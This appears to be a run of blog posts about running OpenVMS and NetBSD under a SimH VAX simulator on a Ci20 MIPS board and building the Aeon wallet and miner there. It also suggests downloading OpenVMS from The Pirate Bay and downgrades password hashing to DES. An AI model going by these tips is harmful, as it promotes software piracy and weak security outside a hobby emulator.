 libasound.so.2 => /usr/lib/libasound.so.2 (0x77a1e000)
 libpulse-simple.so.0 => /usr/lib/libpulse-simple.so.0 (0x77a0a000)
 libpulse.so.0 => /usr/lib/libpulse.so.0 (0x779ad000)
 libX11.so.6 => /usr/lib/libX11.so.6 (0x77866000)
 libXext.so.6 => /usr/lib/libXext.so.6 (0x77843000)
 libXcursor.so.1 => /usr/lib/libXcursor.so.1 (0x77829000)
 libXinerama.so.1 => /usr/lib/libXinerama.so.1 (0x77816000)
 libXi.so.6 => /usr/lib/libXi.so.6 (0x777f4000)
 libXrandr.so.2 => /usr/lib/libXrandr.so.2 (0x777d9000)
 libXss.so.1 => /usr/lib/libXss.so.1 (0x777c7000)
 libXxf86vm.so.1 => /usr/lib/libXxf86vm.so.1 (0x777b1000)
 libwayland-egl.so.1 => /usr/lib/libwayland-egl.so.1 (0x7779f000)
 libwayland-client.so.0 => /usr/lib/libwayland-client.so.0 (0x77783000)
 libwayland-cursor.so.0 => /usr/lib/libwayland-cursor.so.0 (0x7776b000)
 libxkbcommon.so.0 => /usr/lib/libxkbcommon.so.0 (0x7771f000)
 /lib/ld.so.1 (0x77ee6000)
 libpcre.so.3 => /lib/mipsel-linux-gnu/libpcre.so.3 (0x7769e000)
 libpulsecommon-5.0.so => /usr/lib/mipsel-linux-gnu/pulseaudio/libpulsecommon-5.0.so (0x77619000)
 libcap.so.2 => /lib/mipsel-linux-gnu/libcap.so.2 (0x77604000)
 libjson-c.so.2 => /lib/mipsel-linux-gnu/libjson-c.so.2 (0x775ea000)
 libdbus-1.so.3 => /lib/mipsel-linux-gnu/libdbus-1.so.3 (0x77590000)
 libxcb.so.1 => /usr/lib/libxcb.so.1 (0x77562000)
 libXrender.so.1 => /usr/lib/libXrender.so.1 (0x77547000)
 libXfixes.so.3 => /usr/lib/libXfixes.so.3 (0x77531000)
 libffi.so.6 => /usr/lib/libffi.so.6 (0x77518000)
 libX11-xcb.so.1 => /usr/lib/libX11-xcb.so.1 (0x77506000)
 libICE.so.6 => /usr/lib/libICE.so.6 (0x774dc000)
 libSM.so.6 => /usr/lib/libSM.so.6 (0x774c3000)
 libXtst.so.6 => /usr/lib/libXtst.so.6 (0x774ac000)
 libsystemd.so.0 => /lib/mipsel-linux-gnu/libsystemd.so.0 (0x77477000)
 libwrap.so.0 => /lib/mipsel-linux-gnu/libwrap.so.0 (0x7745e000)
 libsndfile.so.1 => /usr/lib/libsndfile.so.1 (0x773d7000)
 libasyncns.so.0 => /usr/lib/libasyncns.so.0 (0x773c1000)
 libattr.so.1 => /lib/mipsel-linux-gnu/libattr.so.1 (0x773ac000)
 libXau.so.6 => /usr/lib/libXau.so.6 (0x77399000)
 libXdmcp.so.6 => /usr/lib/libXdmcp.so.6 (0x77384000)
 libuuid.so.1 => /lib/mipsel-linux-gnu/libuuid.so.1 (0x7736d000)
 liblzma.so.5 => /lib/mipsel-linux-gnu/liblzma.so.5 (0x77339000)
 libgcrypt.so.20 => /lib/mipsel-linux-gnu/libgcrypt.so.20 (0x77276000)
 libresolv.so.2 => /lib/mipsel-linux-gnu/libresolv.so.2 (0x77250000)
 libnsl.so.1 => /lib/mipsel-linux-gnu/libnsl.so.1 (0x77227000)
 libFLAC.so.8 => /usr/lib/libFLAC.so.8 (0x771e2000)
 libvorbisenc.so.2 => /usr/lib/libvorbisenc.so.2 (0x7714f000)
 libgpg-error.so.0 => /lib/mipsel-linux-gnu/libgpg-error.so.0 (0x7712d000)
 libogg.so.0 => /usr/lib/libogg.so.0 (0x77115000)
 libvorbis.so.0 => /usr/lib/libvorbis.so.0 (0x770d9000)

Getting OpenVMS 7.3 images

Now there are of course official ways and these should be followed so please refer to this instruction https://astr0baby.wordpress.com/2017/10/22/setting-up-dw-motif-on-openvms-8-4-2-alphavm-linux64/  on how to register for DECUServe since we will need the hobbyist licenses for the OpenVMS anyway.

Or you can just grab a copy from the PirateBay (search for OpenVMS)  https://www.thepiratebay.org/torrent/4810604/OpenVMS_VAX_7.3

Setting up the environment

Now lets prepare the VMS environment on the Ci20 board.  Screenshot below is my layout, we will go through it step by step.

So obviously we need to upload the OpenVMS 7.3 CD ISO file to the board,  and place it in the simulator directory which I have called OpenVMS

Next we need to create the dua0 disk image disk.dd , I have used 512 MB size via the following command

dd if=/dev/zero of=disk.dd bs=1024 count=512K

We will also need the vax.ini configuration file populated, my example

;
; Load CPU microcode
load -r /home/ci20/OpenVMS/ka655x.bin
;
; This virtual machine has 64M memory
set cpu 128m
;
; Define disk drive types. RA92 is largest-supported VAX drive.
set rq0 ra92
set rq3 cdrom
;
; Attach defined drives to local files
attach rq0 /home/ci20/OpenVMS/disk.dd
;
; Attach the CD-ROM to its file (read-only)
attach -r rq3 /home/ci20/OpenVMS/cd.iso
;
; Disable unused devices. It's also possible to disable individual devices,
; using a construction like "set rq2 disable" if desired.
;
set rl disable
set ts disable
;
; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0
;
; Now start the emulator
boot cpu

From the above configuration we are looking at these custom locations and files

/home/ci20/OpenVMS/ka655x.bin   <--- thats the Vax ROM file you can 
downlod from https://github.com/simh/simh/blob/master/VAX/ka655x.bin

attach rq0 /home/ci20/OpenVMS/disk.dd  <--- this is out dua0 disk
attach -r rq3 /home/ci20/OpenVMS/cd.iso <-- this is the VMS cdrom

Next we need to configure the networking part to be able to use TCPIP on the simulated OpenVMS.

Please install these tools for the bridging

# apt-get install libpcap-dev  bridge-utils uml-utilities

And here is my networking script (networking.sh)  to get all the needed to run (execute this before we load the simulator with root privs)

#Setup tap and bridge 
tunctl -t tap0 -u ci20 
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0 
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next we place the actual simulator binary vax into our working directory and create a simple loader called run.sh that will initiate the simulator and which contains this:

./vax vms.ini

we are now ready for the first boot

Booting up OpenVMS 7.3 and installing it

follow these steps to boot up the simulator – please note that we will be running under root here most of the time – not for the faint hearted :)

#./networking.sh 
#./run.sh

Once inside the SIM> list all devices by >>> sho dev     as seen below

KA655X-B V5.3, VMB 2.7
Performing normal system tests.
40..39..38..37..36..35..34..33..32..31..30..29..28..27..26..25..
24..23..22..21..20..19..18..17..16..15..14..13..12..11..10..09..
08..07..06..05..04..03..
Tests completed.
>>>sho dev
UQSSP Disk Controller 0 (772150)
-DUA0 (RA92)
-DUA1 (RD54)
-DUA2 (RD54)
-DUA3 (RRD40)

UQSSP Tape Controller 0 (774500)
-MUA0 (TK50)
-MUA1 (TK50)
-MUA2 (TK50)
-MUA3 (TK50)

Ethernet Adapter 0 (774440)
-XQA0 (08-00-2B-AA-BB-CC)
>>>

We will see all the devices that we will use, for now what is important is the CDROM DUA3 device and the DISK.DD DUA0 device.

To boot the CDROM image simply issue boot dua3 command

>>> boot dua3

Next we will be using instructions from Phillip Wherry located here  https://www.wherry.com/gadgets/retrocomputing/vax-simh.html which are wery well written and cointain very detailed OpenVMS installation procedure.

Please read from section “Install the OpenVMS Operating System“

I will only be including the differences I did here from Phillips document

We only have one disk dua0 !! so change the commands accordingly

When asked for DECwindows install them 
* Do you want the DECwindows base support? (Y/N) Y

Before installing TCPIP please make sure you set the INTSTKPAGES to 
value at least 40 (needed for the DW-MOTIF as well) 

$ set proc/priv=all 
$ r sys$system:sysgen 
SYSGEN> SET INTSTKPAGES 40 
SYSGEN> WRITE CURRENT 
SYSGEN> EXIT
$ shutdown 

During TCPIP setup dont configure domain 
* Configuration options:

1 - Domain           <--- NO 
2 - Interfaces       <--- YES 
3 - Routing          <--- YES 
4 - BIND Resolver    <--- YES 
5 - Time Zone        <--- NO 

Please use the following TCPIP configuration options to get network
running on your CI20 OpenVMS 

Interfaces

Routing

Resolver

Choose google DNS for exampe 8.8.8.8 and name it googleresolver

Getting the DW-MOTIF up

to mount a cdrom image 
$ set proc/priv=all
$ mount/over=id dua3:


to browse it 
$ set def DUA3:[000000]

To install DW-MOTIF stuff
$ set def [DWMOTIF_VAX126.kit]
$ product install *

Once the above sets install you can enable the remote X desktop via the following sequence  (192.168.11.3 is an IP of my other laptop that runs Linux and Xming via wine)

• Download Xming from  https://sourceforge.net/projects/xming/files/Xming/6.9.0.31/
• Make sure you have Wine configured on your linux machine
• add the following in the .wine/drive_c/Program Files (x86)/Xming/X1.hosts  (192.168.11.10 is the IP of the CI20 device)

CI20
CI20
192.168.11.10

On OpenVMS Ci20

set display/create/node=192.168.11.3/transport=tcpip/server=3 
run sys$system:decw$startlogin.exe

And on the Linux machine with the installed Xming execute the following

$ cd .wine/drive_c/Program\ Files\ \(x86\)/Xming/
$ wine Xming.exe :3

You will get the following screen

Troubleshooting

Sometimes the simulator bails out on this error,  to fix it simple reload the simh

>>>boot dua0
(BOOT/R5:0 DUA0

2..
?4C DEVINACT, DUA0
HALT instruction, PC: 00000C1A (MOVL (R11),SP)
sim> exit
Goodbye
Eth: closed tap0

Video Demonstration

The title might be  a little misleading since we are not running NetBSD directly off the Ci20 board, but via SimH-current using the vax simulator.

There is an official guide from the NetBSD project on how to do this here http://www.netbsd.org/ports/vax/emulator-howto.html

I will just re-trace the steps and comment on the differences I have done to get the system up and running.

Prerequisites:

SimH-current from https://github.com/simh/simh

In order to build the simulator you need to apt-get a few things first

root@ci20:~# apt-get install libgles2-mesa libpcrecpp0 libsdl2-2.0-0 
libxcb-randr0 libasound2-dev libavahi-common-dev pkg-config 
libdbus-1-dev libavahi-client-dev libdrm-dev x11proto-dri2-dev 
x11proto-gl-dev x11proto-xext-dev libxext-dev x11proto-xf86vidmode-dev 
libxxf86vm-dev x11proto-fixes-dev libxfixes-dev x11proto-damage-dev 
libxdamage-dev libxcb-glx0-dev libxcb-dri2-0-dev libxcb-dri3-dev 
libxcb-render0-dev libxcb-randr0-dev libxcb-shape0-dev libxcb-xfixes0-dev 
libxcb-sync-dev libxcb-present-dev libxshmfence-dev libx11-xcb-dev 
libwayland-dev libegl1-mesa-dev mesa-common-dev libgl1-mesa-dev 
libgles2-mesa-dev libpcre3-dev libglib2.0-dev libglu1-mesa-dev libice-dev 
libpulse-dev libudev-dev x11proto-render-dev libxrender-dev libxcursor-dev 
libxi-dev x11proto-xinerama-dev libxinerama-dev libxkbcommon-dev 
x11proto-randr-dev libxrandr-dev x11proto-scrnsaver-dev libxss-dev 
libsm-dev libxt-dev x11proto-video-dev libxv-dev libsdl2-dev libpcap-dev
bridge-utils uml-utilities

then we can build the simulator (Im using git from pkgsrc-current ( https://45.76.81.249:8000/pkgsrc/debian8-ci20/)

root@ci20:~# git clone https://github.com/simh/simh.git
root@ci20:~# cd simh 
root@ci20:~# make vax 
root@ci20:~# ls -la /root/simh/BIN      <--- compiled vax binary here

Next we should copy the compiled vax binary to our working directory where we will keep our simulator files

Preparing for Installation:

We start first by creating the working directory and getting the latest NetBSD VAX installation image

root@ci20:~# mkdir -p /home/ci20/NetBSD
root@ci20:~# cd /home/ci20/NetBSD
root@ci20:~# wget http://ftp.netbsd.org/pub/NetBSD/iso/7.1.1/NetBSD-7.1.1-vax.iso
root@ci20:~# cp /root/simh/BIN/vax .

Next we need to create the dua0 disk image disk.dd , I have used 512 MB size via the following command

dd if=/dev/zero of=disk.dd bs=1024 count=512K

Next we prepate the netbsd.ini configuration file for the vax simulator

;
; Load CPU microcode
load -r /home/ci20/NetBSD/ka655x.bin
;
;
; This virtual machine has 64M memory
set cpu 128m
;
; Define disk drive types. RA92 is largest-supported VAX drive.
set rq0 ra92
set rq3 cdrom
;
; Attach defined drives to local files
attach rq0 /home/ci20/NetBSD/disk.dd
;
; Attach the CD-ROM to its file (read-only)
attach -r rq3 /home/ci20/NetBSD/NetBSD-7.1.1-vax.iso
;
; Disable unused devices. It's also possible to disable individual devices,
; using a construction like "set rq2 disable" if desired.
;
set rl disable
set ts disable
;
; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0
;
; Now start the emulator
boot cpu

Next we prepare our network script to get the networking going (This is not only specific to the Ci20 device, but can be used in other scenarios) – basically we assume your internet connection is through the wireless network interface wlan0 ; call this file networking.sh (if your network IP range matches the below, please change accordingly to another subnet)

#Setup tap and bridge 
tunctl -t tap0 -u ci20 
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0 
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Copy over from the simh working directory the VAX/ka655x.bin ROM file

root@ci20:~#cp /root/simh/VAX/ka655x.bin /home/ci20/NetBSD/

Installing NetBSD:

before we load the simulator, make sure we get the network script executed

root@ci20:~#/home/ci20/NetBSD/networking.sh

Next we load the simulation

root@ci20:~#/home/ci20/NetBSD/vax netbsd.ini

In the VMB prompt boot the ISO CDROM

>>> boot dua3

Now you will get to configure NetBSD for VAX, and the installer will start copying over the sets, consider not to install X11 stuff since we are most probably not going to need it (theoretically we can through x11vnc, but the performance of the simulated system won’t be great at all)

NETWORK SETUP

In order to get the network working along the networking.sh script please use the following values for the qt0 network interface – setup network as manual – no dhcp

• media type (none)
• ip 10.0.2.10-10.0.2.100
• default route 10.0.2.2
• DNS 8.8.8.8 or 8.8.4.4

Once the installation is done (takes quite some time, be patient) we can boot the dua0 disk from the VMB prompt.

>>> boot dua0

NetBSD should now boot; here is an example from my session; please note that it takes approximately 8 minutes to boot to the login prompt :)

>>>boot dua0
(BOOT/R5:0 DUA0

2..
-DUA0
 1..0..


>> NetBSD/vax boot [1.11] <<
>> Press any key to abort autoboot 0
nfs_open: must mount first.
open netbsd.vax: Device not configured
> boot netbsd
3101284+172988 [230096+220228]=0x38d948
Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017
 The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
 The Regents of the University of California. All rights reserved.

NetBSD 7.1.1 (GENERIC.201712222334Z)
MicroVAX 3800/3900
total memory = 127 MB
avail memory = 119 MB
kern.module.path=/stand/vax/7.1/modules
mainbus0 (root)
cpu0 at mainbus0: KA655, CVAX microcode rev 6 Firmware rev 83
lance at mainbus0 not configured
uba0 at mainbus0: Q22
dz1 at uba0 csr 160100 vec 304 ipl 17
mtc0 at uba0 csr 174500 vec 774 ipl 17
mscpbus0 at mtc0: version 5 model 3
mscpbus0: DMA burst size set to 4
uda0 at uba0 csr 172150 vec 770 ipl 17
mscpbus1 at uda0: version 3 model 3
mscpbus1: DMA burst size set to 4
qt0 at uba0 csr 174440 vec 764 ipl 17
qt0: delqa-plus in Turbo mode, hardware address 08:00:2b:aa:bb:cc
mt0 at mscpbus0 drive 0: TK50
mt1 at mscpbus0 drive 1: TK50
mt2 at mscpbus0 drive 2: TK50
mt3 at mscpbus0 drive 3: TK50
ra0 at mscpbus1 drive 0: RA92
ra1 at mscpbus1 drive 1: RD54
ra2 at mscpbus1 drive 2: RD54
racd0 at mscpbus1 drive 3: RRD40
ra0: size 2940951 sectors
ra1: attempt to bring on line failed: unit offline (not mounted) (code 3, subcode 1)
ra2: attempt to bring on line failed: unit offline (not mounted) (code 3, subcode 1)
racd0: size 1331200 sectors
boot device: ra0
root on ra0a dumps on ra0b
root file system type: ffs
Sat Mar 10 22:16:45 UTC 2018
Starting root file system check:
/dev/rra0a: file system is clean; not checking
swapctl: setting dump device to /dev/ra0b
swapctl: adding /dev/ra0b as swap device at priority 0
Starting file system checks:
Loaded entropy from /var/db/entropy-file.
Setting tty flags.
Setting sysctl variables:
ddb.onpanic: 1 -> 0
Starting network.
Hostname: netbsd
IPv6 mode: host
Configuring network interfaces: qt0.
Adding interface aliases:.
add net default: gateway 10.0.2.2
Waiting for DAD completion for statically configured addresses...
Building databases: dev, utmp, utmpx.
Starting syslogd.
Mounting all file systems...
Clearing temporary files.
Creating a.out runtime link editor directory cache.
Checking quotas: done.
Setting securelevel: kern.securelevel: 0 -> 1
swapctl: setting dump device to /dev/ra0b
Starting virecover.
Checking for core dump...
savecore: no core dump
Starting local daemons:.
Updating motd.
/etc/rc: WARNING: Ignoring non-executable file /etc/rc.d/sshd
/etc/rc: WARNING: Ignoring non-executable file /etc/rc.d/postfix
Starting inetd.
Starting cron.
Sat Mar 10 22:23:54 UTC 2018

NetBSD/vax (netbsd) (console)

login: Mar 10 22:29:06 netbsd su: user to root on /dev/pts/0


NetBSD/vax (netbsd) (console)

login: root
Password:
Mar 10 23:41:13 netbsd login: ROOT LOGIN (root) on tty console
Last login: Sat Mar 10 20:25:31 2018 on console
Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017
 The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
 The Regents of the University of California. All rights reserved.

NetBSD 7.1.1 (GENERIC.201712222334Z)

Welcome to NetBSD!

Terminal type? [unknown] vt220
Terminal type is vt220. 
We recommend that you create a non-root account and use su(1) for root access.
netbsd#

Important to note from the above, if we enable OpenSSH during installation, we will get stuck when the ssh-host keys would get generated (I had no time to wait till it finishes, so I cannot really say how log it would take)

What I did during the boot is when we get stuck on the “Updating motd ” this means that the system is loading sshd now and since there are no ssh keys present it tries to generate them, anyways it will look like it is stuck here, so we can ctrl+c to skip sshd loading and then do the same for the postfix post-installation tasks during boot.

By default NetBSD 7.1.1 will install with SHA1 password cipher, now when logging in as root for the first time, bear in mind that the process takes quite some time (SimH VAX + Ci20 mipsel). So once we are logged in, I have changed the following things to make life a little easier here:

• Set the terminal to vt220 when logging in

Fix permanently, by modifying the $user/.profile as follows

export HOST="$(hostname)"
export TERM=vt220 
#if [ -x /usr/bin/tset ]; then
# eval $(tset -sQrm 'unknown:?unknown')
#fi

Next we should change the local password algo to speedup the login process; degrading to DES … SHA1 or Blowfish make no sense on the SIMH VAX platform.

netbsd# cat /etc/passwd.conf 

# $NetBSD: passwd.conf,v 1.3 2010/12/03 21:40:04 jmmv Exp $
#
# passwd.conf(5) -
# password configuration file
#

default:
 localcipher = old 
 ypcipher = old

Also I had to disable the sshd and postfix rc scripts from running  (chmod -x )

netbsd# ls -al /etc/rc.d/sshd 
-r--r--r-- 1 root wheel 1296 Dec 23 03:17 /etc/rc.d/sshd
netbsd# ls -al /etc/rc.d/postfix 
-r--r--r-- 1 root wheel 2270 Dec 23 03:17 /etc/rc.d/postfix
netbsd#

To get sshd running on the SimH VAX NetBSD simulation I had to generate the ssh_host keys on some other machine

  ssh-keygen -f ./ssh_host_rsa_key -N '' -t rsa
  ssh-keygen -f ./ssh_host_dsa_key -N '' -t dsa
  ssh-keygen -f ./ssh_host_ecdsa_key -N '' -t ecdsa
  ssh-keygen -f ./ssh_host_ecdsa_key -N '' -t ed25519
  ssh-keygen -f ./ssh_host_ed25519_key -N '' -t ed25519

And copy paste the contents to the simulated VAX NetBSD into /etc/ssh/

drwxr-xr-x 2 root wheel 512 Mar 10 20:08 .
drwxr-xr-x 27 root wheel 2048 Mar 11 00:04 ..
-r--r--r-- 1 root wheel 1780 Dec 23 03:17 ssh_config
-rw------- 1 root wheel 672 Mar 10 20:22 ssh_host_dsa_key
-rw-r--r-- 1 root wheel 604 Mar 10 20:23 ssh_host_dsa_key.pub
-rw------- 1 root wheel 227 Mar 10 20:07 ssh_host_ecdsa_key
-rw-r--r-- 1 root wheel 176 Mar 10 20:06 ssh_host_ecdsa_key.pub
-rw------- 1 root wheel 411 Mar 10 20:08 ssh_host_ed25519_key
-rw-r--r-- 1 root wheel 96 Mar 10 20:08 ssh_host_ed25519_key.pub
-rw------- 1 root wheel 1681 Mar 10 20:25 ssh_host_rsa_key
-rw-r--r-- 1 root wheel 396 Mar 10 20:25 ssh_host_rsa_key.pub
-r--r--r-- 1 root wheel 10263 Dec 23 03:17 ssh_known_hosts
-r--r--r-- 1 root wheel 3739 Dec 23 03:17 sshd_config

And added a dummy sshd loader into the /etc/rc.local

echo -n 'Starting local daemons:'
/usr/sbin/sshd

Either load sshd directly or reboot, connecting to the VAX NetBSD should work (again be patient, ssh connection takes some time to run)

So we are pretty much done for the basic part. Feel free to explore what NetBSD has to offer on the VAX platform – you have many tools at your disposal

GCC for example

netbsd# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/lto-wrapper
Target: vax--netbsdelf
Configured with: /usr/7/src/tools/gcc/../../external/gpl3/gcc/dist/configure --target=vax--netbsdelf --enable-long-long --enable-threads --with-bugurl=http://www.NetBSD.org/Misc/send-pr.html --with-pkgversion='NetBSD nb2 20150115' --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-threads --enable-libstdcxx-time=rt --enable-lto --with-mpc-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/mpc/lib/libmpc --with-mpfr-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/mpfr/lib/libmpfr --with-gmp-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/gmp/lib/libgmp --with-mpc-include=/usr/7/src/external/lgpl3/mpc/dist/src --with-mpfr-include=/usr/7/src/external/lgpl3/mpfr/dist/src --with-gmp-include=/usr/7/src/external/lgpl3/gmp/lib/libgmp/arch/vax --disable-multilib --disable-symvers --disable-libstdcxx-pch --build=x86_64-unknown-netbsd6.0. --host=vax--netbsdelf --with-sysroot=/var/obj/mknative/vax/usr/7/src/destdir.vax
Thread model: posix
gcc version 4.8.5 (nb2 20150115)

Plus I wonder how much hardcore would be to bootstrap pkgsrc on the simulated VAX NetBSD on the Ci20 creator board :) Might be worth a try and some few weeks for automated retro fun.

Aeon is one of the lighter versions of CryptoNight based crypto currencies.

AEON uses the CryptoNight-Lite POW. CryptoNight(popularized by Monero) and CryptoNight-lite are identical except for the size of the scratchpad needed (1mb vs 2mb). The original CryptoNight proof of work calls for a 2mb scratchpad, which means for every CryptoNight(Monero) mining thread there needs to be 2mb of CPU cache available. AEON reduces this requirement to 1mb of cache per thread thus increasing the amount of work a processor can do when hitting a CPU cache constraint.

During this exercise we will see how to port the source-code to be able to run the Aeon simplewallet and simpleminer programs.

The source-code is available via git here https://github.com/aeonix/aeon

Pre-requisites:

GCC 4.7.3 or later, CMake 2.8.6 or later, and Boost 1.53 or later. I have built all the needed things via pkgsrc-current on the Ci20 (GCC you can use the native one ) I have compiled all the pkgsrc packages for the Debian8 Ci20 NAND image here : https://45.76.81.249:8000/pkgsrc/debian8-ci20/All/

Building :

On the Ci20 device

# git clone https://github.com/aeonix/aeon.git
# cd aeon 
# mkdir dist 
# cd dist 
# cmake ..

This should create the Makefiles in the dist project directory. Also we need to decide what exactly we will be building.

root@ci20:~/aeon/dist# make help
The following are some of the valid targets for this Makefile:
... all (the default if no target is provided)
... clean
... depend
... install/local
... install
... rebuild_cache
... install/strip
... edit_cache
... test
... list_install_components
... version
... libminiupnpc-static
... cryptonote_core
... wallet
... common
... crypto
... ringct
... daemon
... simpleminer
... connectivity_tool
... rpc
... simplewallet
... tests
... net_load_tests_srv
... functional_tests
... performance_tests
... crypto-tests
... hash-tests
... unit_tests
... difficulty-tests
... hash-target-tests
... net_load_tests_clt
... coretests
... core_proxy
... gtest_main
... gtest
root@ci20:~/aeon/dist#

Please note that building the daemon will make absolutely no sense on the Ci20 board, since the aeond (used to sync the blockchain) stores the blockchain in RAM and you would need something like 16 Gb ram + 12 Gb ssd swap.  We will be building only the simplewallet and simpleminer (you can also build the test modules)

Now we need to touch the original code a little since we are building this on mips architecture. Here is a first error we will get when running make

root@ci20:~/aeon/dist# make simplewallet
[ 0%] Built target version
Scanning dependencies of target libminiupnpc-static
[ 1%] Building C object external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/igd_desc_parse.c.o
cc: error: unrecognized command line option ‘-maes’
external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/build.make:62: recipe for target 'external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/igd_desc_parse.c.o' failed

We can fix the above quite easily (the Ci20 mips CPU does not support the -maes option since it is only for x86 https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html )   and ppc64 , but definitely not for 32 bit dev boards (mips,arm) so we change it via sed

root@ci20:~/aeon/dist# grep -lRZ '\-maes' . | xargs -0 -l sed -i -e 's/\-maes//g'

Once we get rid of all the -maes options in the Makefiles we move on and end up after a long time with another error

root@ci20:~/aeon/dist# make simplewallet 

[52%] Linking CXX executable simplewallet
libwallet.a(wallet2.cpp.o): In function `std::__atomic_base<unsigned long long>::operator++()':
/usr/include/c++/4.9/bits/atomic_base.h:408: undefined reference to `__atomic_fetch_add_8'

Now the above can be simply fixed by adding the -latomic to the link file for simplewallet link.txt

root@ci20:~/aeon/dist# vi ./src/CMakeFiles/simplewallet.dir/link.txt
add -latomic to the end of the file so it looks like this 

/usr/bin/c++ -std=c++11 -D_GNU_SOURCE -Wall -Wextra -Wpointer-arith -Wundef -Wvla -Wwrite-strings -Werror -Wno-error=extra -Wno-error=deprecated-declarations -Wno-error=sign-compare -Wno-error=strict-aliasing -Wno-error=type-limits -Wno-unused-parameter -Wno-error=unused-variable -Wno-error=undef -Wno-error=uninitialized -Wlogical-op -Wno-error=maybe-uninitialized -Wno-reorder -Wno-missing-field-initializers -march=native -g -DNDEBUG -rdynamic CMakeFiles/simplewallet.dir/simplewallet/password_container.cpp.o CMakeFiles/simplewallet.dir/simplewallet/simplewallet.cpp.o -o simplewallet -Wl,-rpath,/usr/pkg/lib libwallet.a librpc.a libcryptonote_core.a libcrypto.a libcommon.a libringct.a ../external/miniupnpc/libminiupnpc.a -lpthread /usr/pkg/lib/libboost_system.so /usr/pkg/lib/libboost_filesystem.so /usr/pkg/lib/libboost_thread.so /usr/pkg/lib/libboost_date_time.so /usr/pkg/lib/libboost_chrono.so /usr/pkg/lib/libboost_regex.so /usr/pkg/lib/libboost_serialization.so /usr/pkg/lib/libboost_program_options.so /usr/pkg/lib/libboost_atomic.so -lrt -lpthread -latomic

Continue with the build

root@ci20:~/aeon/dist# make simplewallet
[100%] Built target simplewallet 

root@ci20:~/aeon/dist# make simpleminer
[ 11%] Built target ringct
[ 35%] Built target cryptonote_core
[ 44%] Built target common
[ 94%] Built target crypto
Scanning dependencies of target simpleminer
[ 97%] Building CXX object src/CMakeFiles/simpleminer.dir/miner/simpleminer.cpp.o
[100%] Linking CXX executable simpleminer
[100%] Built target simpleminer

If you wish to build the test suites you will need to add the -atomic to their corresponding linker files

root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/performance_tests.dir/link.txt
add -latomic to the end
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/unit_tests.dir/link.txt
add -latomic to the end
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/coretests.dir/link.txt
add -latomic to the end 
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/core_proxy.dir/link.txt
add -latomic to the end

The binaries are located here

root@ci20:~/aeon/dist/src# ls -alstr
total 178376
 4 -rw-r--r-- 1 root root 1118 Mar 15 06:09 cmake_install.cmake
 56 -rw-r--r-- 1 root root 56618 Mar 15 06:09 Makefile
 4 -rw-r--r-- 1 root root 246 Mar 15 06:09 CTestTestfile.cmake
 0 drwxr-xr-x 12 root root 1056 Mar 15 06:09 CMakeFiles
 0 drwxr-xr-x 8 root root 872 Mar 15 06:13 ..
20776 -rw-r--r-- 1 root root 21272790 Mar 15 06:24 librpc.a
54616 -rw-r--r-- 1 root root 55925862 Mar 15 06:51 libcryptonote_core.a
44616 -rw-r--r-- 1 root root 45685940 Mar 15 07:13 libwallet.a
 2888 -rw-r--r-- 1 root root 2953342 Mar 15 07:18 libcommon.a
 1884 -rw-r--r-- 1 root root 1929188 Mar 15 07:20 libcrypto.a
 5084 -rw-r--r-- 1 root root 5205088 Mar 15 07:25 libringct.a
36352 -rwxr-xr-x 1 root root 37221816 Mar 15 07:37 simplewallet
12096 -rwxr-xr-x 1 root root 12385100 Mar 15 18:37 simpleminer
 0 drwxr-xr-x 3 root root 1048 Mar 15 21:54 .

We can copy the two binaries somewhere else, here are the shared libraries used by the programs

root@ci20:~/bin# ldd simpleminer 
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x7722f000)
 libboost_system.so.1.66.0 => /usr/pkg/lib/libboost_system.so.1.66.0 (0x7721b000)
 libboost_filesystem.so.1.66.0 => /usr/pkg/lib/libboost_filesystem.so.1.66.0 (0x771ef000)
 libboost_thread.so.1.66.0 => /usr/pkg/lib/libboost_thread.so.1.66.0 (0x771bc000)
 libboost_date_time.so.1.66.0 => /usr/pkg/lib/libboost_date_time.so.1.66.0 (0x7719b000)
 libboost_chrono.so.1.66.0 => /usr/pkg/lib/libboost_chrono.so.1.66.0 (0x77184000)
 libboost_regex.so.1.66.0 => /usr/pkg/lib/libboost_regex.so.1.66.0 (0x77047000)
 libboost_serialization.so.1.66.0 => /usr/pkg/lib/libboost_serialization.so.1.66.0 (0x77004000)
 libboost_program_options.so.1.66.0 => /usr/pkg/lib/libboost_program_options.so.1.66.0 (0x76f78000)
